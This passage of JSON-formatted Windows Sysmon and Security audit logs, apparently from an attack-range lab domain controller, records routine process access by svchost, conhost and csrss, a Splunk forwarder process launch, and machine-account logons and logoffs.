indows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6019,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:45.754\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:45.754","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6020,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:45.754\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:45.754","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6021,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:45.754\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20F1-5F25-0000-0010184E0900}\r\nTargetProcessId: 4676\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:45.754","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20F1-5F25-0000-0010184E0900}","TargetProcessId":"4676","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220675,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x65EB5\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x65eb5","LogonType":"3","EventReceivedTime":"2020-08-01 08:00:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220676,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x95979\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x95979","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 08:00:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220677,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x95979\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t50190\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x95979","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"50190","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 08:00:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220678,"ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x95979\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x95979","LogonType":"3","EventReceivedTime":"2020-08-01 08:00:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6022,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:40.662\r\nProcessGuid: {41C8662E-2128-5F25-0000-0010585A0900}\r\nProcessId: 3144\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:00:40.662","ProcessGuid":"{41C8662E-2128-5F25-0000-0010585A0900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6023,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:40.662\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2128-5F25-0000-0010585A0900}\r\nTargetProcessId: 3144\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:40.662","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2128-5F25-0000-0010585A0900}","TargetProcessId":"3144","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6024,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:40.662\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2128-5F25-0000-0010585A0900}\r\nTargetProcessId: 3144\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:40.662","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2128-5F25-0000-0010585A0900}","TargetProcessId":"3144","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6025,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:40.662\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 